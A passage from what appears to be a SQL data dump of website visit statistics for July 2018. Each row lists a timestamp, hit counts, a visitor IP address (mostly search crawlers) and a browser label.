4559,1,0,1,0,'66.249.69.189',''),(268202,1530794613,1,1,0,0,'216.244.66.241','other'),(268203,1530794886,4,0,4,0,'66.249.69.230',''),(268204,1530794994,1,0,1,0,'66.249.69.232',''),(268205,1530795145,1,1,0,0,'91.196.178.103','chrome'),(268206,1530795205,1,1,0,0,'8.29.198.26','other'),(268207,1530795432,4,4,0,0,'178.154.171.88','other'),(268208,1530795462,1,1,0,0,'141.8.142.74','other'),(268209,1530795570,1,1,0,0,'54.36.149.11','other'),(268210,1530795666,4,4,0,0,'216.244.66.241','other'),(268211,1530795704,1,1,0,0,'91.196.178.73','chrome'),(268212,1530795839,1,1,0,0,'66.249.69.228','chrome'),(268213,1530795842,1,1,0,0,'54.36.148.253','other'),(268214,1530795845,1,0,1,0,'66.249.69.230',''),(268215,1530796101,1,1,0,0,'54.36.148.226','other'),(268216,1530796113,1,1,0,0,'54.36.148.251','other'),(268217,1530796230,1,0,1,0,'66.249.69.232',''),(268218,1530796472,1,1,0,0,'54.36.149.34','other'),(268219,1530796757,1,0,1,0,'66.249.69.228',''),(268220,1530796775,1,1,0,0,'54.36.148.123','other'),(268221,1530796797,1,0,1,0,'66.249.69.230',''),(268222,1530796844,1,1,0,0,'54.36.148.216','other'),(268223,1530796891,1,1,0,0,'54.36.148.43','other'),(268224,1530796954,1,1,0,0,'130.180.218.145','chrome'),(268225,1530796957,1,1,0,0,'66.249.69.228','chrome'),(268226,1530797134,1,1,0,0,'54.36.148.19','other'),(268227,1530797226,1,1,0,0,'95.163.255.183','other'),(268228,1530797228,1,1,0,0,'95.163.255.173','other'),(268229,1530797309,1,1,0,0,'54.36.149.3','other'),(268230,1530797342,1,1,0,0,'178.154.171.88','other'),(268231,1530797642,2,0,2,0,'66.249.69.187',''),(268232,1530797820,8,0,8,0,'66.249.69.230',''),(268233,1530797863,4,0,4,0,'66.249.69.228',''),(268234,1530798101,1,1,0,0,'54.36.148.212','other'),(268235,1530798258,1,1,0,0,'54.36.149.0','other'),(268236,1530798271,1,1,0,0,'85.10.199.185','other'),(268237,1530798357,2,2,0,0,'216.244.66.241','other'),(268238,1530798364,1,1,0,0,'87.250.224.125','other'),(268239,1530798468,1,1,0,0,'157.55.39.102','other'),(268240,1530798569,1,0,1,0,'66.249.69.232',''),(268241,1530798577,1,1,0,0,'87.250.224.46','other'),(268242,1530798784,1,1,0,0,'141.8.142.50','other'),(268243,1530798796,4,4,0,0,'208.110.93.52','other'),(268244,1530798907,1,1,0,0,'54.36.148.155','other'),(268245,1530798929,1,1,0,0,'91.196.178.136','chrome'),(268246,1530799033,3,0,3,0,'66.249.69.228',''),(268247,1530799079,1,1,0,0,'54.36.148.28','other'),(268248,1530799261,2,2,0,0,'216.244.66.241','other'),(268249,1530799513,1,0,1,0,'66.249.69.230',''),(268250,1530799583,1,1,0,0,'54.36.149.45','other'),(268251,1530799700,1,0,1,0,'66.249.69.189',''),(268252,1530799740,1,1,0,0,'54.36.149.63','other'),(268253,1530799848,1,1,0,0,'54.36.148.14','other'),(268254,1530799967,1,0,1,0,'66.249.69.187',''),(268255,1530799978,1,1,0,0,'178.92.53.107','chrome'),(268256,1530800094,4,0,4,0,'66.249.69.228',''),(268257,1530800199,1,1,0,0,'95.163.255.92','other'),(268258,1530800245,1,1,0,0,'178.154.200.32','other'),(268259,1530800251,1,1,0,0,'54.36.148.104','other'),(268260,1530800306,1,1,0,0,'54.36.148.221','other'),(268261,1530800380,1,1,0,0,'178.154.171.81','other'),(268262,1530800401,1,1,0,0,'54.36.148.207','other'),(268263,1530800486,1,1,0,0,'178.154.171.88','other'),(268264,1530800498,1,1,0,0,'54.36.148.12','other'),(268265,1530800626,1,0,1,0,'66.249.69.230',''),(268266,1530800735,1,0,1,0,'66.249.69.189',''),(268267,1530800770,2,0,2,0,'66.249.69.232',''),(268268,1530800850,1,1,0,0,'95.163.255.96','other'),(268269,1530801016,3,1,2,0,'66.249.69.228',''),(268270,1530801392,1,1,0,0,'107.167.106.219','other'),(268271,1530801446,1,1,0,0,'54.36.149.23','other'),(268272,1530801504,3,3,0,0,'216.244.66.241','other'),(268273,1530801818,1,1,0,0,'8.29.198.25','other'),(268274,1530801912,1,1,0,0,'141.8.142.74','other'),(268275,1530802011,2,2,0,0,'87.250.224.46','other'),(268276,1530802215,2,0,2,0,'66.249.69.232',''),(268277,1530802258,4,0,4,0,'66.249.69.230',''),(268278,1530802559,1,1,0,0,'95.163.255.166','other'),(268279,1530802698,2,0,2,0,'66.249.69.228',''),(268280,1530802783,1,1,0,0,'54.36.148.246','other'),(268281,1530802814,1,1,0,0,'188.230.43.254','other'),(268282,1530802916,1,1,0,0,'178.154.171.88','other'),(268283,1530803027,1,1,0,0,'87.250.224.46','other'),(268284,1530803358,2,2,0,0,'216.244.66.241','other'),(268285,1530803476,1,1,0,0,'66.249.69.232','chrome'),(268286,1530803477,4,0,4,0,'66.249.69.185',''),(268287,1530803635,8,0,8,0,'66.249.69.228',''),(268288,1530803695,1,0,1,0,'66.249.69.187',''),(268289,1530803717,1,1,0,0,'54.36.148.148','other'),(268290,1530804070,1,1,0,0,'54.36.148.66','other'),(268291,1530804225,2,2,0,0,'91.121.83.160','chrome'),(268292,1530804241,6,0,6,0,'66.249.69.230',''),(268293,1530804259,6,6,0,0,'148.251.9.145','other'),(268294,1530804286,1,1,0,0,'91.209.11.236','other'),(268295,1530804333,7,7,0,0,'5.9.152.73','other'),(268296,1530804381,1,1,0,0,'178.154.171.4','other'),(268297,1530804411,1,1,0,0,'54.36.148.138','other'),(268298,1530804422,1,1,0,0,'141.8.142.74','other'),(268299,1530804490,1,1,0,0,'54.36.148.82','other'),(268300,1530804511,1,1,0,0,'54.36.149.88','other'),(268301,1530804623,2,1,1,0,'66.249.69.189',''),(268302,1530804629,1,1,0,0,'54.36.148.186','other'),(268303,1530804720,2,0,2,0,'66.249.69.232',''),(268304,1530804877,2,0,2,0,'66.249.69.228',''),(268305,1530805004,3,3,0,0,'216.244.66.241','other'),(268306,1530805234,1,1,0,0,'188.230.43.254','other'),(268307,1530805305,1,1,0,0,'66.249.69.228','chrome'),(268308,1530805534,1,1,0,0,'54.36.148.125','other'),(268309,1530805592,3,3,0,0,'141.8.142.74','other'),(268310,1530805926,1,1,0,0,'54.36.149.10','other'),(268311,1530806017,1,1,0,0,'95.163.255.97','other'),(268312,1530806044,1,1,0,0,'8.29.198.26','other'),(268313,1530806132,1,1,0,0,'54.36.148.52','other'),(268314,1530806189,3,0,3,0,'66.249.69.232',''),(268315,1530806279,3,0,3,0,'66.249.69.230',''),(268316,1530806416,2,0,2,0,'66.249.69.187',''),(268317,1530806460,1,1,0,0,'157.55.39.102','other'),(268318,1530806605,1,0,1,0,'66.249.69.189',''),(268319,1530806742,4,0,4,0,'66.249.69.228',''),(268320,1530807194,1,0,1,0,'66.249.69.230',''),(268321,1530807197,1,1,0,0,'141.8.142.74','other'),(268322,1530807390,1,1,0,0,'216.244.66.241','other'),(268323,1530807575,2,0,2,0,'66.249.69.185',''),(268324,1530807617,1,1,0,0,'188.230.43.254','other'),(268325,1530807982,2,2,0,0,'91.196.178.41','chrome'),(268326,1530808057,1,1,0,0,'95.163.255.191','other'),(268327,1530808059,1,1,0,0,'95.163.255.167','other'),(268328,1530808178,1,1,0,0,'91.196.178.69','firefox'),(268329,1530808276,2,0,2,0,'66.249.69.228',''),(268330,1530808496,1,1,0,0,'54.36.148.19','other'),(268331,1530808752,2,2,0,0,'141.8.142.74','other'),(268332,1530808812,1,1,0,0,'66.249.69.187','chrome'),(268333,1530809483,1,0,1,0,'66.249.69.189',''),(268334,1530809575,3,0,3,0,'66.249.69.228',''),(268335,1530809673,1,1,0,0,'54.36.148.17','other'),(268336,1530809981,3,0,3,0,'66.249.69.232',''),(268337,1530810086,1,0,1,0,'66.249.69.187',''),(268338,1530810213,1,1,0,0,'54.36.148.54','other'),(268339,1530810349,1,1,0,0,'216.244.66.241','other'),(268340,1530810453,1,1,0,0,'54.36.149.92','other'),(268341,1530810504,1,1,0,0,'54.36.149.64','other'),(268342,1530810544,2,0,2,0,'66.249.69.228',''),(268343,1530810563,1,1,0,0,'54.36.148.100','other'),(268344,1530810624,2,2,0,0,'141.8.142.74','other'),(268345,1530810922,1,1,0,0,'54.36.148.84','other'),(268346,1530811186,1,1,0,0,'54.36.149.40','other'),(268347,1530811190,1,1,0,0,'54.36.148.87','other'),(268348,1530811228,1,1,0,0,'54.36.149.25','other'),(268349,1530811302,1,1,0,0,'54.36.149.44','other'),(268350,1530811363,1,1,0,0,'54.36.149.97','other'),(268351,1530811620,2,0,2,0,'66.249.69.230',''),(268352,1530811674,1,1,0,0,'54.36.149.94','other'),(268353,1530811797,1,0,1,0,'66.249.69.187',''),(268354,1530811799,1,1,0,0,'95.163.255.97','other'),(268355,1530811833,2,2,0,0,'92.113.189.235','chrome'),(268356,1530811893,2,0,2,0,'66.249.69.228',''),(268357,1530811918,1,1,0,0,'54.36.148.119','other'),(268358,1530811941,1,1,0,0,'54.36.148.253','other'),(268359,1530812029,2,2,0,0,'216.244.66.241','other'),(268360,1530812169,1,1,0,0,'54.36.148.50','other'),(268361,1530812198,3,1,2,0,'66.249.69.230',''),(268362,1530812223,1,1,0,0,'54.36.149.9','other'),(268363,1530812296,1,1,0,0,'54.36.148.234','other'),(268364,1530812327,1,1,0,0,'54.36.149.89','other'),(268365,1530812663,1,1,0,0,'8.29.198.26','other'),(268366,1530812703,1,1,0,0,'54.36.148.74','other'),(268367,1530813333,1,1,0,0,'54.36.148.21','other'),(268368,1530813349,1,0,1,0,'66.249.69.230',''),(268369,1530813365,1,0,1,0,'66.249.69.185',''),(268370,1530813392,1,1,0,0,'95.163.255.155','other'),(268371,1530813452,1,1,0,0,'54.36.148.182','other'),(268372,1530813554,1,1,0,0,'54.36.148.75','other'),(268373,1530813739,1,1,0,0,'141.8.142.74','other'),(268374,1530814011,1,0,1,0,'66.249.69.189',''),(268375,1530814031,1,1,0,0,'54.36.148.214','other'),(268376,1530814096,1,0,1,0,'66.249.69.228',''),(268377,1530814109,2,2,0,0,'91.121.83.160','chrome'),(268378,1530814229,1,1,0,0,'91.209.11.236','other'),(268380,1530814360,1,0,1,0,'66.249.69.230',''),(268381,1530814423,2,2,0,0,'178.154.171.88','other'),(268382,1530814599,5,5,0,0,'216.244.66.241','other'),(268383,1530814649,1,1,0,0,'141.8.142.74','other'),(268384,1530814660,1,1,0,0,'213.180.203.8','other'),(268385,1530814732,2,2,0,0,'91.196.178.177','chrome'),(268386,1530814839,1,1,0,0,'54.36.149.89','other'),(268387,1530815328,2,0,2,0,'66.249.69.187',''),(268388,1530815331,1,1,0,0,'54.36.148.96','other'),(268389,1530815411,1,1,0,0,'54.36.149.18','other'),(268390,1530815499,1,0,1,0,'66.249.69.185',''),(268391,1530815577,1,1,0,0,'178.154.171.88','other'),(268392,1530815787,1,1,0,0,'54.36.148.141','other'),(268393,1530816313,1,0,1,0,'66.249.69.187',''),(268394,1530816333,1,1,0,0,'54.36.148.251','other'),(268395,1530816342,3,0,3,0,'66.249.69.232',''),(268396,1530816417,1,1,0,0,'54.36.148.240','other'),(268397,1530816602,4,4,0,0,'216.244.66.241','other'),(268398,1530816632,1,1,0,0,'141.8.142.74','other'),(268399,1530816730,1,1,0,0,'54.36.149.96','other'),(268400,1530816804,1,0,1,0,'66.249.69.230',''),(268401,1530816851,1,0,1,0,'66.249.69.185',''),(268402,1530816895,1,1,0,0,'8.29.198.27','other'),(268403,1530817459,4,0,4,0,'66.249.69.228',''),(268404,1530817532,1,1,0,0,'95.163.255.92','other'),(268405,1530817684,3,3,0,0,'216.244.66.241','other'),(268406,1530817811,1,0,1,0,'66.249.69.230',''),(268407,1530817872,1,0,1,0,'66.249.69.232',''),(268408,1530818408,1,1,0,0,'54.36.148.160','other'),(268409,1530818651,2,2,0,0,'141.8.142.74','other'),(268410,1530818688,1,1,0,0,'128.72.177.186','firefox'),(268411,1530818719,1,1,0,0,'95.163.255.169','other'),(268412,1530818799,1,1,0,0,'141.8.132.19','other'),(268413,1530818914,1,1,0,0,'95.163.255.159','other'),(268414,1530818961,2,0,2,0,'66.249.69.232',''),(268415,1530819056,3,3,0,0,'216.244.66.241','other'),(268416,1530819090,1,1,0,0,'54.36.148.210','other'),(268417,1530819201,1,0,1,0,'66.249.69.189',''),(268418,1530819302,1,1,0,0,'54.36.148.249','other'),(268419,1530819314,2,0,2,0,'66.249.69.230',''),(268420,1530819499,1,1,0,0,'54.36.148.124','other'),(268421,1530819572,1,1,0,0,'54.36.149.52','other'),(268422,1530819576,2,2,0,0,'5.9.154.68','other'),(268423,1530819642,1,1,0,0,'54.36.149.19','other'),(268424,1530819691,1,1,0,0,'54.36.149.34','other'),(268425,1530819846,1,1,0,0,'54.36.148.121','other'),(268426,1530820017,1,1,0,0,'138.201.205.40','other'),(268427,1530820033,1,1,0,0,'37.9.113.182','other'),(268428,1530820096,3,3,0,0,'216.244.66.241','other'),(268429,1530820098,1,1,0,0,'54.36.148.212','other'),(268430,1530820131,1,1,0,0,'54.36.149.64','other'),(268431,1530820184,1,1,0,0,'54.36.149.10','other'),(268432,1530820371,1,1,0,0,'54.36.149.76','other'),(268433,1530820423,1,1,0,0,'54.36.148.142','other'),(268434,1530820646,1,1,0,0,'54.36.149.7','other'),(268435,1530821001,1,1,0,0,'37.9.113.182','other'),(268436,1530821085,1,1,0,0,'54.36.148.120','other'),(268437,1530821211,2,0,2,0,'66.249.69.230',''),(268438,1530821250,1,0,1,0,'66.249.69.228',''),(268439,1530821279,1,1,0,0,'54.36.148.92','other'),(268440,1530821298,1,1,0,0,'54.36.148.72','other'),(268441,1530821356,1,1,0,0,'54.36.148.223','other'),(268442,1530821643,1,0,1,0,'66.249.69.232',''),(268443,1530821723,1,1,0,0,'216.244.66.241','other'),(268444,1530821796,1,1,0,0,'66.249.69.185','chrome'),(268445,1530822066,2,1,1,0,'66.249.69.232',''),(268446,1530822325,1,1,0,0,'141.8.142.74','other'),(268447,1530822469,1,1,0,0,'37.9.113.132','other'),(268448,1530822492,1,1,0,0,'54.36.148.52','other'),(268449,1530822568,1,1,0,0,'54.36.148.136','other'),(268450,1530822883,1,1,0,0,'54.36.148.163','other'),(268451,1530823000,1,0,1,0,'66.249.69.232',''),(268452,1530823025,1,1,0,0,'157.55.39.97','other'),(268453,1530823364,1,1,0,0,'180.76.15.149','other'),(268454,1530823517,1,1,0,0,'8.29.198.25','other'),(268455,1530823777,1,0,1,0,'66.249.69.189',''),(268456,1530824102,1,0,1,0,'66.249.69.230',''),(268457,1530824224,1,1,0,0,'141.8.142.74','other'),(268458,1530824802,1,1,0,0,'54.36.148.231','other'),(268459,1530824877,1,1,0,0,'54.36.149.76','other'),(268460,1530825145,1,1,0,0,'87.250.224.46','other'),(268461,1530825225,1,1,0,0,'54.36.148.30','other'),(268462,1530825254,1,1,0,0,'54.36.148.86','other'),(268463,1530825337,3,3,0,0,'141.8.142.74','other'),(268464,1530825403,2,2,0,0,'216.244.66.241','other'),(268465,1530825969,1,1,0,0,'54.36.148.104','other'),(268466,1530826005,6,6,0,0,'35.237.107.116','firefox'),(268467,1530826009,2,2,0,0,'35.237.107.116','other'),(268468,1530826457,1,1,0,0,'5.165.24.252','msie'),(268469,1530826789,1,0,1,0,'66.249.69.230',''),(268470,1530826821,1,1,0,0,'66.249.69.185','chrome'),(268471,1530826900,1,1,0,0,'54.36.149.57','other'),(268472,1530826957,2,2,0,0,'141.8.142.74','other'),(268473,1530827497,3,3,0,0,'216.244.66.241','other'),(268474,1530827597,1,1,0,0,'54.36.148.198','other'),(268475,1530827731,1,1,0,0,'8.29.198.26','other'),(268476,1530827831,1,1,0,0,'213.180.203.8','other'),(268477,1530827888,3,3,0,0,'141.8.142.74','other'),(268478,1530827929,1,1,0,0,'54.36.148.189','other'),(268479,1530828179,1,1,0,0,'91.121.83.160','chrome'),(268480,1530828343,2,2,0,0,'95.163.255.99','other'),(268481,1530828459,3,3,0,0,'178.154.171.88','other'),(268482,1530829567,1,1,0,0,'54.36.148.189','other'),(268483,1530829968,1,1,0,0,'141.8.132.19','other'),(268484,1530830149,1,1,0,0,'54.36.148.169','other'),(268485,1530830357,1,1,0,0,'54.36.148.230','other'),(268486,1530830438,1,1,0,0,'178.154.171.88','other'),(268487,1530830477,2,2,0,0,'141.8.142.74','other'),(268488,1530830616,7,7,0,0,'216.244.66.241','other'),(268489,1530831086,1,1,0,0,'54.36.148.86','other'),(268490,1530831233,1,1,0,0,'54.36.148.75','other'),(268491,1530831398,1,1,0,0,'95.163.255.107','other'),(268492,1530831407,2,2,0,0,'95.163.255.113','other'),(268493,1530831413,1,1,0,0,'95.163.255.105','other'),(268494,1530831491,1,1,0,0,'141.8.142.74','other'),(268495,1530831710,1,1,0,0,'54.36.149.18','other'),(268496,1530832088,1,1,0,0,'54.36.148.16','other'),(268497,1530832131,1,1,0,0,'54.36.149.77','other'),(268498,1530832248,1,1,0,0,'54.36.148.87','other'),(268499,1530832330,1,1,0,0,'180.76.15.19','other'),(268500,1530832404,1,1,0,0,'54.36.148.178','other'),(268501,1530832996,1,1,0,0,'54.36.149.6','other'),(268502,1530833213,1,1,0,0,'80.252.155.198','firefox'),(268503,1530833246,1,1,0,0,'141.8.142.74','other'),(268504,1530833842,4,4,0,0,'216.244.66.241','other'),(268505,1530833904,1,1,0,0,'54.36.148.149','other'),(268506,1530833925,1,1,0,0,'54.36.148.217','other'),(268507,1530833982,1,1,0,0,'95.163.255.97','other'),(268508,1530834227,1,1,0,0,'95.163.255.99','other'),(268509,1530834355,1,1,0,0,'8.29.198.27','other'),(268510,1530834409,1,1,0,0,'54.36.148.32','other'),(268511,1530834951,1,1,0,0,'54.36.148.54','other'),(268512,1530835077,1,1,0,0,'95.163.255.197','other'),(268513,1530835174,1,1,0,0,'141.8.142.74','other'),(268514,1530835261,1,1,0,0,'54.36.149.28','other'),(268515,1530835284,1,1,0,0,'178.154.171.88','other'),(268516,1530835515,1,1,0,0,'54.36.148.216','other'),(268517,1530835525,1,1,0,0,'54.36.148.243','other'),(268518,1530835741,1,1,0,0,'54.36.148.194','other'),(268519,1530835816,1,1,0,0,'216.244.66.241','other'),(268520,1530836271,1,1,0,0,'54.36.148.99','other'),(268521,1530836366,1,1,0,0,'91.121.83.160','chrome'),(268522,1530836561,1,1,0,0,'54.36.148.96','other'),(268523,1530836806,1,1,0,0,'54.36.148.172','other'),(268524,1530836831,3,3,0,0,'216.244.66.241','other'),(268525,1530837610,1,1,0,0,'54.36.148.157','other'),(268526,1530837803,1,1,0,0,'54.36.148.246','other'),(268527,1530838011,1,1,0,0,'54.36.148.71','other'),(268528,1530838148,1,1,0,0,'54.36.148.170','other'),(268529,1530838235,1,1,0,0,'54.36.148.198','other'),(268530,1530838455,1,1,0,0,'54.36.148.52','other'),(268531,1530838566,1,1,0,0,'8.29.198.25','other'),(268532,1530838744,1,1,0,0,'54.36.148.66','other'),(268533,1530839237,3,3,0,0,'216.244.66.241','other'),(268534,1530839427,1,1,0,0,'54.36.148.247','other'),(268535,1530839442,1,1,0,0,'54.36.148.169','other'),(268536,1530840269,1,1,0,0,'54.36.148.69','other'),(268537,1530840340,1,1,0,0,'54.36.148.226','other'),(268538,1530840549,1,1,0,0,'95.163.255.164','other'),(268539,1530840725,1,1,0,0,'95.163.255.188','other'),(268540,1530840960,1,1,0,0,'54.36.148.113','other'),(268541,1530841181,1,1,0,0,'54.36.148.248','other'),(268542,1530841196,1,1,0,0,'54.36.148.36','other'),(268543,1530841763,3,3,0,0,'216.244.66.241','other'),(268544,1530842011,1,1,0,0,'54.36.148.121','other'),(268545,1530842047,1,1,0,0,'54.36.148.79','other'),(268546,1530842190,1,1,0,0,'54.36.149.100','other'),(268547,1530842677,4,4,0,0,'216.244.66.241','other'),(268548,1530843462,1,1,0,0,'54.36.149.72','other'),(268549,1530843824,1,1,0,0,'216.244.66.241','other'),(268550,1530843961,1,1,0,0,'54.36.149.73','other'),(268551,1530844008,1,1,0,0,'54.36.148.235','other'),(268552,1530844216,1,1,0,0,'54.36.149.28','other'),(268553,1530844999,1,1,0,0,'95.163.255.93','other'),(268554,1530845020,3,3,0,0,'216.244.66.241','other'),(268555,1530845200,1,1,0,0,'8.29.198.26','other'),(268556,1530845390,1,1,0,0,'54.36.148.219','other'),(268557,1530845509,1,1,0,0,'54.36.149.55','other'),(268558,1530846482,1,1,0,0,'54.36.148.193','other'),(268559,1530846619,1,1,0,0,'54.36.149.74','other'),(268560,1530846622,2,2,0,0,'92.113.189.235','chrome'),(268561,1530847189,1,1,0,0,'54.36.148.169','other'),(268562,1530847425,1,1,0,0,'46.185.2.145','chrome'),(268563,1530847841,8,8,0,0,'216.244.66.241','other'),(268564,1530847875,1,1,0,0,'54.36.148.220','other'),(268565,1530847894,1,1,0,0,'54.36.149.57','other'),(268566,1530848881,1,1,0,0,'54.36.148.250','other'),(268567,1530849396,1,1,0,0,'8.29.198.25','other'),(268568,1530849980,1,1,0,0,'54.36.148.27','other'),(268569,1530850012,1,1,0,0,'216.244.66.241','other'),(268570,1530850064,1,1,0,0,'54.36.149.46','other'),(268571,1530850278,1,1,0,0,'54.36.148.175','other'),(268572,1530850362,1,1,0,0,'54.36.148.172','other'),(268573,1530850668,1,1,0,0,'95.163.255.95','other'),(268574,1530850886,16,16,0,0,'192.151.157.210','other'),(268575,1530850889,1,1,0,0,'54.36.148.17','other'),(268576,1530850971,1,1,0,0,'54.36.148.67','other'),(268577,1530851032,1,1,0,0,'95.163.255.94','other'),(268578,1530851288,1,1,0,0,'216.244.66.241','other'),(268579,1530851447,2,2,0,0,'95.163.255.190','other'),(268580,1530851508,1,1,0,0,'95.163.255.189','other'),(268581,1530851701,1,1,0,0,'54.36.148.219','other'),(268582,1530852077,1,1,0,0,'54.36.149.17','other'),(268583,1530852190,1,1,0,0,'193.106.30.99','firefox'),(268584,1530852250,1,1,0,0,'54.36.148.152','other'),(268585,1530852447,1,1,0,0,'188.230.43.254','other'),(268586,1530852450,1,1,0,0,'54.36.148.232','other'),(268587,1530852616,1,1,0,0,'54.36.148.37','other'),(268588,1530852939,1,1,0,0,'54.36.148.27','other'),(268589,1530852972,1,1,0,0,'54.36.148.139','other'),(268590,1530852985,1,1,0,0,'54.36.149.23','other'),(268591,1530853008,1,1,0,0,'54.36.148.205','other'),(268592,1530853040,1,1,0,0,'54.36.149.3','other'),(268593,1530853174,2,2,0,0,'91.196.178.169','chrome'),(268594,1530853495,1,1,0,0,'46.105.124.55','firefox'),(268595,1530853511,1,1,0,0,'54.36.149.99','other'),(268596,1530853641,1,1,0,0,'216.244.66.241','other'),(268597,1530853897,1,1,0,0,'54.36.148.38','other'),(268598,1530854227,1,1,0,0,'54.36.148.171','other'),(268599,1530854509,1,1,0,0,'54.36.148.119','other'),(268600,1530854571,1,1,0,0,'178.93.19.5','chrome'),(268601,1530854642,1,1,0,0,'54.36.149.15','other'),(268602,1530854842,1,1,0,0,'54.165.59.7','other'),(268603,1530855080,1,1,0,0,'54.36.148.86','other'),(268604,1530855087,1,1,0,0,'54.36.148.232','other'),(268605,1530855241,1,1,0,0,'54.36.148.117','other'),(268606,1530855672,1,1,0,0,'54.36.149.82','other'),(268607,1530855880,1,1,0,0,'95.163.255.92','other'),(268608,1530855937,1,1,0,0,'178.93.19.5','chrome'),(268609,1530855957,1,1,0,0,'54.36.149.22','other'),(268610,1530855981,1,1,0,0,'54.36.149.80','other'),(268611,1530855982,1,1,0,0,'178.95.248.143','chrome'),(268612,1530856042,1,1,0,0,'8.29.198.25','other'),(268613,1530856177,1,1,0,0,'95.163.255.95','other'),(268614,1530856295,2,2,0,0,'216.244.66.241','other'),(268615,1530856465,1,1,0,0,'54.36.149.85','other'),(268616,1530856884,1,1,0,0,'95.163.255.158','other'),(268617,1530857040,1,1,0,0,'95.163.255.170','other'),(268618,1530857608,2,2,0,0,'91.196.178.41','chrome'),(268619,1530858234,1,1,0,0,'54.36.149.25','other'),(268620,1530858370,1,1,0,0,'54.36.149.81','other'),(268621,1530858401,1,1,0,0,'54.36.149.5','other'),(268622,1530858586,2,0,2,0,'66.249.69.232',''),(268623,1530858594,1,1,0,0,'80.252.155.198','firefox'),(268624,1530858782,1,1,0,0,'66.249.69.189','chrome'),(268625,1530858799,1,1,0,0,'66.249.69.232','chrome'),(268626,1530858838,1,1,0,0,'54.36.149.90','other'),(268627,1530858959,1,1,0,0,'91.196.178.75','chrome'),(268628,1530859038,1,1,0,0,'54.36.149.68','other'),(268629,1530859157,5,5,0,0,'216.244.66.241','other'),(268630,1530859523,1,1,0,0,'52.53.201.78','chrome'),(268631,1530860252,1,1,0,0,'8.29.198.26','other'),(268632,1530860836,1,0,1,0,'66.249.69.228',''),(268633,1530860910,11,11,0,0,'173.212.213.176','other'),(268634,1530861673,1,1,0,0,'95.163.255.97','other'),(268635,1530861684,1,1,0,0,'95.163.255.98','other'),(268636,1530862152,2,2,0,0,'216.244.66.241','other'),(268637,1530862269,2,2,0,0,'91.196.178.75','chrome'),(268638,1530862466,1,1,0,0,'54.36.148.226','other'),(268639,1530862540,1,1,0,0,'95.163.255.153','other'),(268640,1530862546,1,1,0,0,'95.163.255.168','other'),(268641,1530862615,1,1,0,0,'31.43.31.139','chrome'),(268642,1530862627,1,1,0,0,'54.36.148.47','other'),(268643,1530862819,1,1,0,0,'91.121.83.160','chrome'),(268644,1530862854,1,1,0,0,'54.36.148.106','other'),(268645,1530862862,1,1,0,0,'54.36.149.69','other'),(268646,1530862884,1,0,1,0,'66.249.69.189',''),(268647,1530863281,1,1,0,0,'91.196.178.129','firefox'),(268648,1530863542,1,1,0,0,'54.36.149.14','other'),(268649,1530863614,1,1,0,0,'54.36.149.104','other'),(268650,1530863956,2,2,0,0,'91.196.178.169','chrome'),(268651,1530864016,1,1,0,0,'91.121.83.160','chrome'),(268652,1530864280,1,1,0,0,'54.36.149.35','other'),(268653,1530864568,1,1,0,0,'54.36.149.46','other'),(268654,1530864663,1,1,0,0,'54.36.148.212','other'),(268655,1530864836,7,7,0,0,'216.244.66.241','other'),(268656,1530865093,1,1,0,0,'54.36.149.49','other'),(268657,1530865434,1,1,0,0,'54.36.148.205','other'),(268658,1530865704,1,1,0,0,'54.36.148.131','other'),(268659,1530865752,1,1,0,0,'216.244.66.241','other'),(268660,1530865794,1,1,0,0,'54.36.148.96','other'),(268661,1530865991,1,1,0,0,'37.53.232.11','chrome'),(268662,1530866587,1,1,0,0,'54.36.149.94','other'),(268663,1530866885,1,1,0,0,'8.29.198.25','other'),(268664,1530866988,1,1,0,0,'95.163.255.97','other'),(268665,1530867526,1,1,0,0,'54.36.148.26','other'),(268666,1530867556,1,1,0,0,'54.36.148.73','other'),(268667,1530867954,1,1,0,0,'95.163.255.176','other'),(268668,1530868261,4,4,0,0,'216.244.66.241','other'),(268669,1530868307,1,1,0,0,'54.36.149.88','other'),(268670,1530868415,1,1,0,0,'54.36.148.44','other'),(268671,1530868987,2,2,0,0,'54.165.59.7','other'),(268672,1530869170,1,1,0,0,'46.229.168.80','other'),(268673,1530869466,1,1,0,0,'54.36.148.158','other'),(268674,1530869531,1,1,0,0,'54.36.148.42','other'),(268675,1530869831,1,1,0,0,'216.244.66.241','other'),(268676,1530870128,1,1,0,0,'178.92.129.20','chrome'),(268677,1530870258,1,1,0,0,'54.36.148.220','other'),(268678,1530870333,1,1,0,0,'91.124.182.170','firefox'),(268679,1530870771,1,1,0,0,'54.36.148.144','other'),(268680,1530871102,1,1,0,0,'8.29.198.25','other'),(268681,1530871124,4,4,0,0,'216.244.66.241','other'),(268682,1530871231,2,2,0,0,'178.251.107.32','chrome'),(268683,1530871272,1,1,0,0,'91.196.178.103','chrome'),(268684,1530871692,1,0,1,0,'66.249.69.232',''),(268685,1530871797,1,1,0,0,'66.249.69.187','chrome'),(268686,1530871799,1,1,0,0,'66.249.69.232','chrome'),(268687,1530871852,1,1,0,0,'37.54.126.87','chrome'),(268688,1530871877,1,1,0,0,'54.36.149.22','other'),(268689,1530872150,1,1,0,0,'54.36.148.162','other'),(268690,1530872451,1,1,0,0,'95.163.255.93','other'),(268691,1530872544,1,1,0,0,'54.36.148.124','other'),(268692,1530872947,1,1,0,0,'54.36.148.108','other'),(268693,1530872950,1,1,0,0,'54.36.149.73','other'),(268694,1530873001,1,1,0,0,'54.36.148.206','other'),(268695,1530873019,1,1,0,0,'54.36.148.129','other'),(268696,1530873163,1,1,0,0,'95.163.255.95','other'),(268697,1530873201,1,0,1,0,'66.249.69.230',''),(268698,1530873440,1,1,0,0,'54.36.148.97','other'),(268699,1530873445,1,1,0,0,'176.118.54.187','chrome'),(268700,1530873574,1,1,0,0,'195.128.139.142','chrome'),(268701,1530873594,1,1,0,0,'54.36.148.176','other'),(268702,1530873612,1,1,0,0,'54.36.148.34','other'),(268703,1530873701,2,2,0,0,'216.244.66.241','other'),(268704,1530873830,1,1,0,0,'54.36.148.182','other'),(268705,1530873857,1,1,0,0,'54.36.148.209','other'),(268706,1530873976,1,1,0,0,'54.36.149.91','other'),(268707,1530874028,1,1,0,0,'188.226.216.119','chrome'),(268708,1530874092,1,1,0,0,'54.36.149.87','other'),(268709,1530874277,2,2,0,0,'162.210.196.97','other'),(268710,1530874965,1,1,0,0,'54.36.148.123','other'),(268711,1530875169,1,1,0,0,'54.36.149.15','other'),(268712,1530875225,1,0,1,0,'66.249.69.228',''),(268713,1530875510,1,1,0,0,'46.219.239.137','chrome'),(268714,1530875738,1,0,1,0,'66.249.69.187',''),(268715,1530875816,3,3,0,0,'216.244.66.241','other'),(268716,1530875990,1,1,0,0,'66.249.69.185','chrome'),(268717,1530876456,1,1,0,0,'194.88.153.136','chrome'),(268718,1530